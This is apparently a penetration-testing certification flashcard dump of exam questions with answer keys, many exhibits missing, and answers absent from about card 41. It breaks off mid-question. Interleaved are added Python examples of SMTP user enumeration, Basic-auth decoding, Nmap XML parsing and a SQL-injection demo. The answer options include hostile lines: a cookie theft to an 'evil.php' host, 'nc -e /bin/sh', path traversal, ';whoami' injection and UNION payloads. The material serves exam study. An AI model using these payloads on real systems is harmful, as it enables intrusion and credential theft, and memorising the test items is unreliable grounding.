Dump 2 Flashcards

1
Q

A penetration tester receives the following results from an Nmap scan:

Which of the following OSs is the target MOST likely running?

A.
CentOS
B.
Arch Linux
C.
Windows Server
D.
Ubuntu

A

Answer: C

2
Q

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path
attack between the target and the server that has the FTP protocol. Which of the following
methods would be the BEST to accomplish this objective?

A.
Wait for the next login and perform a downgrade attack on the server.
B.
Capture traffic using Wireshark.
C.
Perform a brute-force attack over the server.
D.
Use an FTP exploit against the server.

A

Answer: B

3
Q

Appending string values onto another string is called:

A.
compilation
B.
connection
C.
concatenation
D.
conjunction

A

Answer: C

4
Q

A consultant is reviewing the following output after reports of intermittent connectivity issues:

Which of the following is MOST likely to be reported by the consultant?

A.
A device on the network has an IP address in the wrong subnet.
B.
A multicast session was initiated using the wrong multicast group.
C.
An ARP flooding attack is using the broadcast address to perform DDoS.
D.
A device on the network has poisoned the ARP cache.

A

Answer: D

5
Q

Which of the following web-application security risks are part of the OWASP Top 10 v2017?
(Choose two.)

A.
Buffer overflows
B.
Cross-site scripting
C.
Race-condition attacks
D.
Zero-day attacks
E.
Injection flaws
F.
Ransomware attacks

A

Answer: B,E

6
Q

The results of an Nmap scan are as follows:

Which of the following would be the BEST conclusion about this device?

A.
This device may be vulnerable to the Heartbleed bug due to the way transactions over TCP/22
handle heartbeat extension packets, allowing attackers to obtain sensitive information from
process memory.
B.
This device is most likely a gateway with in-band management services.
C.
This device is most likely a proxy server forwarding requests over TCP/443.
D.
This device may be vulnerable to remote code execution because of a buffer overflow vulnerability
in the method used to extract DNS names from packets prior to DNSSEC validation.

A

Answer: B

7
Q

When preparing for an engagement with an enterprise organization, which of the following is one
of the MOST important items to develop fully prior to beginning the penetration testing activities?

A.
Clarify the statement of work
B.
Obtain an asset inventory from the client
C.
Interview all stakeholders
D.
Identify all third parties involved.

A

Answer: A

8
Q

A penetration tester is reviewing the following SOW prior to engaging with a client.

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated
as client confidential. Upon completion of the engagement, the penetration tester will submit
findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and
subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered
unethical? (Choose two.)

A.
Utilizing proprietary penetration-testing tools that are not available to the public or to the client for
auditing and inspection.
B.
Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of
the engagement.
C.
Failing to share with the client critical vulnerabilities that exist within the client architecture to
appease the client’s senior leadership team.
D.
Seeking help with the engagement in underground hacker forums by sharing the client’s public IP
address.
E.
Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop.
F.
Retaining the SOW within the penetration tester’s company for future use so the sales team can
plan future engagements.

A

Answer: C,D

9
Q

A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities
in network switches. However, the script is not working properly.

Which of the following changes should the tester apply to make the script work as intended?
A.
Change line 2 to $ip = "10.192.168.254";
B.
Remove lines 3, 5, and 6.
C.
Remove line 6.
D.
Move all the lines below line 7 to the top of the script.

A

Answer: B

10
Q

A penetration tester finds a PHP script used by a web application in an unprotected internal source
code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

A.
Hydra and crunch
B.
Netcat and cURL
C.
Burp Suite and DIRB
D.
Nmap and OWASP ZAP

A

Answer: B

11
Q

A penetration tester has obtained root access to a Linux-based file server and would like to
maintain persistence after reboot. Which of the following techniques would BEST support this
objective?

A.
Create a one-shot system service to establish a reverse shell.
B.
Obtain /etc/shadow and brute force the root password.
C.
Run the nc -e /bin/sh <…> command.
D.
Move laterally to create a user account on LDAP.

A

Answer: A

12
Q

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a
Linux server and discovers the following data in a file named password.txt in the /home/svsacct
directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

A.
echo U3VQZXIkM2NyZXQhCg== | base64 -d
B.
tar zxvf password.txt
C.
hydra -l svsacct -p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24
D.
john --wordlist=/usr/share/seclists/rockyou.txt password.txt

A

Answer: A

13
Q

A company has recruited a penetration tester to conduct a vulnerability scan over the network. The
test is confirmed to be on a known environment. Which of the following would be the BEST option
to identify a system properly prior to performing the assessment?

A.
Asset inventory
B.
DNS records
C.
Web-application scan
D.
Full scan

A

Answer: A

14
Q

A security firm has been hired to perform an external penetration test against a company. The only
information the firm received was the company name. Which of the following passive
reconnaissance approaches would be MOST likely to yield positive initial results?

A.
Specially craft and deploy phishing emails to key company leaders.
B.
Run a vulnerability scan against the company’s external website.
C.
Research the company’s vendor/supply chain.
D.
Scrape web presences and social-networking sites.

A

Answer: D

15
Q

A security firm is discussing the results of a penetration test with the client. Based on the findings,
the client wants to focus the remaining time on a critical network segment. Which of the following
BEST describes the action taking place?

A.
Maximizing the likelihood of finding vulnerabilities
B.
Reprioritizing the goals/objectives
C.
Eliminating the potential for false positives
D.
Reducing the risk to the client environment

A

Answer: B

16
Q

Which of the following tools would be BEST suited to perform a manual web application security
assessment? (Choose two.)

A.
OWASP ZAP
B.
Nmap
C.
Nessus
D.
BeEF
E.
Hydra
F.
Burp Suite

A

Answer: A,F

17
Q

Running a vulnerability scanner on a hybrid network segment that includes general IT servers and
industrial control systems:

A.
will reveal vulnerabilities in the Modbus protocol
B.
may cause unintended failures in control systems
C.
may reduce the true positive rate of findings
D.
will create a denial-of-service condition on the IP networks

A

Answer: B

18
Q

Which of the following provides a matrix of common tactics and techniques used by attackers
along with recommended mitigations?

A.
NIST SP 800-53
B.
OWASP Top 10
C.
MITRE ATT&CK framework
D.
PTES technical guidelines

A

Answer: C

19
Q

A security engineer identified a new server on the network and wants to scan the host to
determine if it is running an approved version of Linux and a patched version of Apache. Which of
the following commands will accomplish this task?

A.
nmap -f -sV -p80 192.168.1.20
B.
nmap -sS -sL -p80 192.168.1.20
C.
nmap -A -T4 -p80 192.168.1.20
D.
nmap -O -v -p80 192.168.1.20

A

Answer: C

20
Q

A mail service company has hired a penetration tester to conduct an enumeration of all user
accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?

A.
VRFY and EXPN
B.
VRFY and TURN
C.
EXPN and TURN
D.
RCPT TO and VRFY

A

Answer: A

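Added example for card 20 (not part of the flashcard dump): what VRFY/EXPN enumeration actually looks like on the wire, with both sides of the exchange. The client only treats a 250 reply as confirmation, because a hardened server answers 252 ("cannot VRFY, will accept") for every name and that proves nothing, while 502 means the command is disabled and further probing is pointless. The toy server, its host name, and the account list TOY_KNOWN_USERS are constructed for the example; the script runs entirely on loopback and never contacts a real mail server.

```python
import socket
import threading

# Constructed: the only accounts the toy server "knows". Stands in for a real
# mail server's user list; nothing here touches a real host.
TOY_KNOWN_USERS = {"alice", "bob"}


def _read_reply(f):
    """Read one SMTP reply, including multi-line replies ('250-...' continuation lines)."""
    lines = []
    while True:
        line = f.readline().decode("ascii", errors="replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return lines[0][:3], "\n".join(lines)


def smtp_enum(host, port, candidates, command="VRFY", timeout=5.0):
    """Probe each candidate with VRFY (or EXPN); return (confirmed, command_disabled).

    Only 250 counts as confirmation. 252 is what hardened servers return for every
    name, 550/551 mean unknown, and 502 means the command is disabled (stop probing).
    """
    confirmed, disabled = [], False
    with socket.create_connection((host, port), timeout=timeout) as s:
        f = s.makefile("rb")
        _read_reply(f)                                  # 220 banner
        s.sendall(b"HELO enum.example.test\r\n")
        _read_reply(f)
        for user in candidates:
            s.sendall(("%s %s\r\n" % (command, user)).encode("ascii"))
            code, _ = _read_reply(f)
            if code == "250":
                confirmed.append(user)
            elif code == "502":
                disabled = True
                break
        s.sendall(b"QUIT\r\n")
        _read_reply(f)                                  # 221
    return confirmed, disabled


def _toy_smtp_server(listener):
    """Minimal server answering HELO/VRFY/EXPN/QUIT like a mail server with VRFY enabled."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(b"220 mail.example.test ESMTP\r\n")
        f = conn.makefile("rb")
        while True:
            line = f.readline()
            if not line:
                return
            cmd, _, arg = line.decode("ascii", errors="replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "HELO":
                conn.sendall(b"250 mail.example.test\r\n")
            elif cmd in ("VRFY", "EXPN"):
                if arg.lower() in TOY_KNOWN_USERS:
                    conn.sendall(("250 %s <%s@example.test>\r\n" % (arg, arg)).encode("ascii"))
                else:
                    conn.sendall(b"550 5.1.1 User unknown\r\n")
            elif cmd == "QUIT":
                conn.sendall(b"221 Bye\r\n")
                return
            else:
                conn.sendall(b"502 5.5.2 Command not implemented\r\n")


def demo(candidates=("alice", "carol", "bob", "dave")):
    """Start the toy server on a loopback port, enumerate against it, return the result."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(target=_toy_smtp_server, args=(listener,), daemon=True)
    t.start()
    try:
        return smtp_enum("127.0.0.1", port, candidates)
    finally:
        t.join(timeout=5)
        listener.close()


if __name__ == "__main__":
    print(demo())
```

Against a real target, point smtp_enum at the server on TCP/25 with a list of former-employee names; if it reports disabled, retry with command="EXPN" (servers often disable the two independently), and note that RCPT TO probing, the other option in the card, needs a MAIL FROM first and is not implemented here.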
21
Q

A penetration tester is evaluating a company’s network perimeter. The tester has received limited
information about defensive controls or countermeasures, and limited internal knowledge of the
testing exists. Which of the following should be the FIRST step to plan the reconnaissance
activities?

A.
Launch an external scan of netblocks.
B.
Check WHOIS and netblock records for the company.
C.
Use DNS lookups and dig to determine the external hosts.
D.
Conduct a ping sweep of the company’s netblocks.

A

Answer: B

22
Q

A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information
being transmitted?

A.
Decode the authorization header using UTF-8.
B.
Decrypt the authorization header using bcrypt.
C.
Decode the authorization header using Base64.
D.
Decrypt the authorization header using AES.

A

Answer: C

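Added example serving cards 12 and 22 (not part of the flashcard dump): both cards are the same operation, decoding Base64, and the distractors (bcrypt, AES) fail for the same reason, since Base64 is an encoding with no key, bcrypt is a one-way hash and AES needs a key the tester does not have. The helper decodes card 12's password.txt value and an HTTP Basic credential, splitting on the first colon only so passwords that contain ':' survive, and re-pads blobs whose trailing '=' was lost in a copy. SAMPLE_AUTH_HEADER and its credential are constructed for the example.

```python
import base64
import binascii

# Constructed sample of what a proxy or packet capture shows during a web-application
# test; the credential inside is invented for this example.
SAMPLE_AUTH_HEADER = "Authorization: Basic YWRtaW46UGFzc3cwcmQh"


def decode_b64_text(blob):
    """Decode a Base64 blob to text, tolerating lost padding.

    Base64 is an encoding, not encryption: no key is involved, so there is nothing
    to 'decrypt'. validate=True rejects stray characters instead of silently
    skipping them, which would otherwise hide a mangled capture.
    """
    blob = blob.strip()
    blob += "=" * (-len(blob) % 4)          # re-pad: a missing '=' is common copy damage
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error as exc:
        raise ValueError("not valid Base64: %s" % exc) from exc
    return raw.decode("utf-8", errors="replace")


def decode_basic_auth(header_line):
    """Return (username, password) from an 'Authorization: Basic ...' header line.

    RFC 7617: the credential is Base64(user ':' password). Only the first ':'
    separates the two, so a password containing ':' is kept intact.
    """
    name, _, value = header_line.partition(":")
    if name.strip().lower() != "authorization":
        raise ValueError("not an Authorization header")
    scheme, _, cred = value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("scheme %r is not Basic; Bearer/Digest need different handling" % scheme)
    user, _, password = decode_b64_text(cred).partition(":")
    return user, password


def decode_password_file(contents):
    """Decode a file holding one Base64 value, as with password.txt in card 12.

    The decoded data ends in a newline (the value was made with echo and no -n),
    which is stripped so the password can be used as-is.
    """
    return decode_b64_text(contents).rstrip("\n")


if __name__ == "__main__":
    print(decode_basic_auth(SAMPLE_AUTH_HEADER))
    print(repr(decode_password_file("U3VQZXIkM2NyZXQhCg==")))
```

The shell one-liner in card 12 (echo ... | base64 -d) does the same thing; the function form is useful when a capture contains many Basic headers to harvest at once.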
23
Q

A penetration tester was hired to perform a physical security assessment of an organization’s
office. After monitoring the environment for a few hours, the penetration tester notices that some
employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate
access into the organization’s building without raising too many alerts?

A.
Tailgating
B.
Dumpster diving
C.
Shoulder surfing
D.
Badge cloning

A

Answer: A

24
Q

A penetration tester wants to find hidden information in documents available on the web at a
particular domain. Which of the following should the penetration tester use?

A.
Netcraft
B.
CentralOps
C.
Responder
D.
FOCA

A

Answer: D

25
Q

A penetration tester has gained access to the Chief Executive Officer’s (CEO’s) internal, corporate
email. The next objective is to gain access to the network. Which of the following methods will
MOST likely work?

A.
Try to obtain the private key used for S/MIME from the CEO’s account.
B.
Send an email from the CEO’s account, requesting a new account.
C.
Move laterally from the mail server to the domain controller.
D.
Attempt to escalate privileges on the mail server to gain root access.

A

Answer: B

26
Q

A penetration tester needs to perform a vulnerability scan against a web server. Which of the
following tools is the tester MOST likely to choose?

A.
Nmap
B.
Nikto
C.
Cain and Abel
D.
Ettercap

A

Answer: B

27
Q

A penetration tester performed a full vulnerability scan on the target servers and noticed numerous
findings for one of the installed applications. The penetration tester found a working exploit that
lacks mitigation or work-around options. Which of the following should the penetration tester
consider?

A.
Network segmentation
B.
Application removal
C.
Patch management
D.
Password encryption

A

Answer: C

28
Q

A penetration tester has been given an assignment to attack a series of targets in the
192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the
following Nmap scan syntaxes would BEST accomplish this objective?

A.
nmap -sT -vvv -O 192.168.1.0/24 -PO
B.
nmap -sV 192.168.1.0/24 -PO
C.
nmap -sA -v -O 192.168.1.0/24
D.
nmap -sS -O 192.168.1.0/24 -T1

A

Answer: D

29
Q

A penetration tester is testing a new version of a mobile application in a sandbox environment. To
intercept and decrypt the traffic between the application and the external API, the tester has
created a private root CA and issued a certificate from it. Even though the tester installed the root
CA into the trusted store of the smartphone used for the tests, the application shows an error
indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?

A.
TCP port 443 is not open on the firewall
B.
The API server is using SSL instead of TLS
C.
The tester is using an outdated version of the application
D.
The application has the API certificate pinned.

A

Answer: D

30
Q

A software company has hired a penetration tester to perform a penetration test on a database
server. The tester has been given a variety of tools used by the company’s privacy policy. Which
of the following would be the BEST to use to find vulnerabilities on this server?

A.
OpenVAS
B.
Nikto
C.
SQLmap
D.
Nessus

A

Answer: D

31
Q

A company is concerned that its cloud service provider is not adequately protecting the VMs
housing its software development. The VMs are housed in a datacenter, with other companies
sharing physical resources. Which of the following attack types is MOST concerning to the
company?

A.
Data flooding
B.
Session riding
C.
Cybersquatting
D.
Side channel

A

Answer: D

32
Q

Which of the following concepts defines the specific set of steps and approaches that are
conducted during a penetration test?

A.
Scope details
B.
Findings
C.
Methodology
D.
Statement of work

A

Answer: C

33
Q

A private investigation firm is requesting a penetration test to determine the likelihood that
attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of
the following is a social-engineering method that, if successful, would MOST likely enable both
objectives?

A.
Send an SMS with a spoofed service number including a link to download a malicious application.
B.
Exploit a vulnerability in the MDM and create a new account and device profile.
C.
Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.
D.
Infect a website that is often used by employees with malware targeted toward x86 architectures.

A

Answer: A

34
Q

A penetration tester ran a ping -A command during an unknown environment test, and it returned
a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.
Windows
B.
Apple
C.
Linux
D.
Android

A

Answer: A

35
Q

A physical penetration tester needs to get inside an organization’s office and collect sensitive
information without acting suspiciously or being noticed by the security guards. The tester has
observed that the company’s ticket gate does not scan the badges, and employees leave their
badges on the table while going to the restroom. Which of the following techniques can the tester
use to gain physical access to the office? (Choose two.)

A.
Shoulder surfing
B.
Call spoofing
C.
Badge stealing
D.
Tailgating
E.
Dumpster diving
F.
Email phishing

A

Answer: C,D

36
Q

A penetration tester conducted an assessment on a web server. The logs from this session show
the following:

Which of the following attacks is being attempted?

A.
Clickjacking
B.
Session hijacking
C.
Parameter pollution
D.
Cookie hijacking
E.
Cross-site scripting

A

Answer: C

37
Q

A new security firm is onboarding its first client. The client only allowed testing over the weekend
and needed the results Monday morning. However, the assessment team was not able to access
the environment as expected until Monday. Which of the following should the security company
have acquired BEFORE the start of the assessment?

A.
A signed statement of work
B.
The correct user accounts and associated passwords
C.
The expected time frame of the assessment
D.
The proper emergency contacts for the client

A

Answer: D

38
Q

An Nmap scan of a network switch reveals the following:

Which of the following technical controls will most likely be the FIRST recommendation for this
device?

A.
Encrypted passwords
B.
System-hardening techniques
C.
Multifactor authentication
D.
Network segmentation

A

Answer: A

39
Q

A penetration tester has obtained shell access to a Windows host and wants to run a specially
crafted binary for later execution using the wmic.exe process call create function. Which of the
following OS or filesystem mechanisms is MOST likely to support this objective?

A.
Alternate data streams
B.
PowerShell modules
C.
MP4 steganography
D.
ProcMon

A

Answer: A

40
Q

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating
proprietary company information. The administrator offers to pay the tester to keep quiet. Which of
the following is the BEST action for the tester to take?

A.
Check the scoping document to determine if exfiltration is within scope.
B.
Stop the penetration test.
C.
Escalate the issue.
D.
Include the discovery and interaction in the daily report.

A

Answer: C

41
Q

A Chief Information Security Officer wants to evaluate the security of the company’s e-commerce
application. Which of the following tools should a penetration tester use FIRST to obtain relevant
information from the application without triggering alarms?

A.
SQLmap
B.
DirBuster
C.
w3af
D.
OWASP ZAP

42
Q

Which of the following documents must be signed between the penetration tester and the client to
govern how any provided information is managed before, during, and after the engagement?

A.
MSA
B.
NDA
C.
SOW
D.
ROE

43
Q

A penetration tester runs a scan against a server and obtains the following output:

Which of the following command sequences should the penetration tester try NEXT?

A.
ftp 192.168.53.23
B.
smbclient \\WEB3\IPC$ -I 192.168.53.23 -U guest
C.
ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
D.
curl -X TRACE https://192.168.53.23:8443/index.aspx

44
Q

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which
of the following commands would allow the tester to save the results in an interchangeable
format?

A.
nmap -iL results 192.168.0.10-100
B.
nmap 192.168.0.10-100 -O > results
C.
nmap -A 192.168.0.10-100 -oX results
D.
nmap 192.168.0.10-100 | grep “results”
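Added example for card 44 (not part of the flashcard dump), which also covers the service-version checks in cards 19 and 54: the XML that -oX writes is the format other tools ingest, and this is the minimal parser a tester needs to turn it into records for upload. SAMPLE_NMAP_XML is a constructed report in the shape nmap emits (hosts, addresses, versions and OS match are made up), and the flat record layout produced here is this example's own choice, not any particular security tool's schema.

```python
import json
import xml.etree.ElementTree as ET

# Constructed sample in the shape `nmap -A ... -oX results` writes; every host,
# address, version and OS match below is invented for the example.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -A 192.168.0.10-11 -oX results" start="1700000000" version="7.94">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.0.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" extrainfo="Ubuntu Linux; protocol 2.0"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.52"/></port>
      <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/></port>
    </ports>
    <os><osmatch name="Linux 5.X" accuracy="96"/></os>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.0.11" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac" vendor="Cisco Systems"/>
    <ports>
      <port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/>
        <service name="telnet"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Turn an nmap XML report into plain dicts: one per live host with its open ports."""
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an nmap XML report (root element %r)" % root.tag)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        hostname = host.find("hostnames/hostname")
        osmatch = host.find("os/osmatch")          # first (best) match only
        ports = []
        for p in host.findall("ports/port"):
            state = p.find("state")
            if state is None or state.get("state") != "open":
                continue                          # closed/filtered ports are noise for upload
            svc = p.find("service")
            ports.append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
            })
        hosts.append({
            "ip": addrs.get("ipv4") or addrs.get("ipv6"),
            "mac": addrs.get("mac"),
            "hostname": hostname.get("name") if hostname is not None else None,
            "os_guess": osmatch.get("name") if osmatch is not None else None,
            "open_ports": ports,
        })
    return {"scanner_args": root.get("args"), "hosts": hosts}


def find_service(report, name):
    """(ip, product, version) for every open port running the named service,
    e.g. to compare each Apache build against the patched baseline (card 19)."""
    return [(h["ip"], p["product"], p["version"])
            for h in report["hosts"] for p in h["open_ports"] if p["service"] == name]


def to_json(xml_text):
    """JSON is what most centralized tools accept; keys sorted for stable diffs."""
    return json.dumps(parse_nmap_xml(xml_text), indent=2, sort_keys=True)


if __name__ == "__main__":
    print(to_json(SAMPLE_NMAP_XML))
```

Note that -oA (card 67) writes the same XML alongside the normal and grepable outputs, so either flag yields a file this parser accepts; plain redirected output (option B in the card) does not, because the human-readable format changes between versions.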

45
Q

During a penetration-testing engagement, a consultant performs reconnaissance of a client to
identify potential targets for a phishing campaign. Which of the following would allow the
consultant to retrieve email addresses for technical and billing contacts quickly, without triggering
any of the client’s cybersecurity tools? (Choose two.)

A.
Scraping social media sites
B.
Using the WHOIS lookup tool
C.
Crawling the client’s website
D.
Phishing company employees
E.
Utilizing DNS lookup tools
F.
Conducting wardriving near the client facility

A

Answer: A,B

46
Q

During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

A.
SOW.
B.
SLA.
C.
ROE.
D.
NDA

47
Q

A tester who is performing a penetration test on a website receives the following output:

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /var/www/search.php on line 62

Which of the following commands can be used to further attack the website?

A.
var adr = '../evil.php?test=' + escape(document.cookie);
B.
../../../../../../../../../../etc/passwd
C.
/var/www/html/index.php;whoami
D.
1 UNION SELECT 1, DATABASE(), 3 --
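Added example for card 47 (not part of the flashcard dump): the mysql_fetch_array() warning means the query failed and the failure leaked to the page, which is the classic sign that user input is being pasted into SQL unquoted; the UNION payload then reads data from a column the page already displays. The example reproduces the bug and the fix against an in-memory SQLite table (constructed rows; sqlite_version() stands in for MySQL's DATABASE(), and the column-count probe shows why the payload needs exactly three columns). One caveat for a real MySQL target: its `--` comment needs a trailing space, so the payload usually ends in `-- ` or `#`.

```python
import sqlite3


def make_demo_db():
    """In-memory stand-in for the site's database; the rows are constructed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "widget", 9.99), (2, "gadget", 19.99)])
    return conn


def search_vulnerable(conn, product_id):
    """The bug behind the warning: the raw parameter is concatenated into the SQL.

    On failure the error text is returned in place of rows, mirroring the PHP page
    where mysql_query() returned false and the message reached the client.
    """
    sql = "SELECT id, name, price FROM products WHERE id = " + str(product_id)
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error: %s" % exc


def search_fixed(conn, product_id):
    """Parameterised query: the input is bound as a value and never parsed as SQL."""
    try:
        pid = int(product_id)
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT id, name, price FROM products WHERE id = ?", (pid,)).fetchall()


# Payloads in the order a tester would send them once the error appears.
PROBE_SYNTAX = "1'"                                           # confirm input reaches the parser
PROBE_COLUMNS = "1 UNION SELECT 1, 2 --"                      # wrong column count: error says so
PAYLOAD_UNION = "1 UNION SELECT 1, sqlite_version(), 3 --"    # SQLite analogue of DATABASE()


def demo():
    """Run each payload against the vulnerable and the fixed handler."""
    conn = make_demo_db()
    return {
        "syntax_probe": search_vulnerable(conn, PROBE_SYNTAX),
        "column_probe": search_vulnerable(conn, PROBE_COLUMNS),
        "union_vulnerable": search_vulnerable(conn, PAYLOAD_UNION),
        "union_fixed": search_fixed(conn, PAYLOAD_UNION),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The vulnerable path returns the legitimate product row plus a second row whose middle column is the database version, which is exactly the information disclosure option D gives the tester; the fixed path returns nothing for the same input because the parameter is not an integer.
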
48
Q

A penetration tester has established an on-path position between a target host and local network
services but has not been able to establish an on-path position between the target host and the
Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A.
Gain access to the target host and implant malware specially crafted for this purpose.
B.
Exploit the local DNS server and add/update the zone records with a spoofed A record.
C.
Use the Scapy utility to overwrite name resolution fields in the DNS query response.
D.
Proxy HTTP connections from the target host to that of the spoofed host.

49
Q

Which of the following types of information would MOST likely be included in an application
security assessment report addressed to developers? (Choose two.)

A.
Use of non-optimized sort functions
B.
Poor input sanitization
C.
Null pointer dereferences
D.
Non-compliance with code style guide
E.
Use of deprecated Javadoc tags
F.
A cyclomatic complexity score of 3

A

Answer: B,C

50
Q

A penetration tester has found indicators that a privileged user’s password might be the same on
30 different Linux systems. Which of the following tools can help the tester identify the number of
systems on which the password can be used?

A.
Hydra
B.
John the Ripper
C.
Cain and Abel
D.
Medusa

51
Q

A penetration tester recently completed a review of the security of a core network device within a
corporate environment. The key findings are as follows:

Which of the following would be BEST to add to the recommendations section of the final report?
(Choose two.)

A.
Enforce enhanced password complexity requirements.
B.
Disable or upgrade SSH daemon.
C.
Disable HTTP/301 redirect configuration.
D.
Create an out-of-band network for management.
E.
Implement a better method for authentication.
F.
Eliminate network management and control interfaces.

A

Answer: D,E

52
Q

A penetration tester was able to compromise a server and escalate privileges. Which of the
following should the tester perform AFTER concluding the activities on the specified target?
(Choose two.)

A.
Remove the logs from the server.
B.
Restore the server backup.
C.
Disable the running services.
D.
Remove any tools or scripts that were installed.
E.
Delete any created credentials.
F.
Reboot the target server.

A

Answer: D,E

53
Q

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from
dig:

;; ANSWER SECTION
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com.
comptia.org. 3569 IN A 3.219.13.186.
comptia.org. 3569 IN NS ns1.comptia.org.
comptia.org. 3569 IN SOA haven. administrator.comptia.org.
comptia.org. 3569 IN MX new.mx0.comptia.org.
comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

A.
At least one of the records is out of scope.
B.
There is a duplicate MX record.
C.
The NS record is not within the appropriate domain.
D.
The SOA records outside the comptia.org domain.

54
Q

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to
remotely identify the type of services that are running on the host. Which of the following is an
active reconnaissance tool that would be BEST to use to accomplish this task?

A.
tcpdump
B.
Snort
C.
Nmap
D.
Netstat
E.
Fuzzer

55
Q

Deconfliction is necessary when the penetration test:

A.
determines that proprietary information is being stored in cleartext.
B.
occurs during the monthly vulnerability scanning.
C.
uncovers indicators of prior compromise over the course of the assessment.
D.
proceeds in parallel with a criminal digital forensic investigation.

56
Q

A penetration tester wants to test a list of common passwords against the SSH daemon on a
network device. Which of the following tools would be BEST to use for this purpose?

A.
Hashcat
B.
Mimikatz
C.
Patator
D.
John the Ripper

57
Q

PCI DSS requires which of the following as part of the penetration-testing process?

A.
The penetration tester must have cybersecurity certifications.
B.
The network must be segmented.
C.
Only externally facing systems should be tested.
D.
The assessment must be performed during non-working hours.

58
Q

A penetration tester completed an assessment, removed all artifacts and accounts created during
the test, and presented the findings to the client. Which of the following happens NEXT?

A.
The penetration tester conducts a retest.
B.
The penetration tester deletes all scripts from the client machines.
C.
The client applies patches to the systems.
D.
The client clears system logs generated during the test.

59
Q

A penetration tester is examining a Class C network to identify active systems quickly. Which of
the following commands should the penetration tester use?

A.
nmap -sn 192.168.0.1/16
B.
nmap -sn 192.168.0.1-254
C.
nmap -sn 192.168.0.1 192.168.0.1.254
D.
nmap -sN 192.168.0.0/24

60
Q

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration
of data using email attachments. Which of the following techniques should the tester select to
accomplish this task?

A.
Steganography
B.
Metadata removal
C.
Encryption
D.
Encode64

61
Q

A penetration tester received a 16-bit network block that was scoped for an assessment. During
the assessment, the tester realized no hosts were active in the provided block of IPs and reported
this to the company. The company then provided an updated block of IPs to the tester. Which of
the following would be the most appropriate NEXT step?

A.
Terminate the contract.
B.
Update the ROE with new signatures.
C.
Scan the 8-bit block to map additional missed hosts.
D.
Continue the assessment.

62
Q

A penetration tester has completed an analysis of the various software products produced by the
company under assessment. The tester found that over the past several years the company has
been including vulnerable third-party modules in multiple products, even though the quality of the
organic code being developed is very good. Which of the following recommendations should the
penetration tester include in the report?

A.
Add a dependency checker into the tool chain.
B.
Perform routine static and dynamic analysis of committed code.
C.
Validate API security settings before deployment.
D.
Perform fuzz testing of compiled binaries.

63
Q

A penetration tester needs to access a building that is guarded by locked gates, a security team,
and cameras. Which of the following is a technique the tester can use to gain access to the IT
framework without being detected?

A.
Pick a lock.
B.
Disable the cameras remotely.
C.
Impersonate a package delivery worker.
D.
Send a phishing email.

64
Q

A penetration tester is assessing a wireless network. Although monitoring the correct channel and
SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the
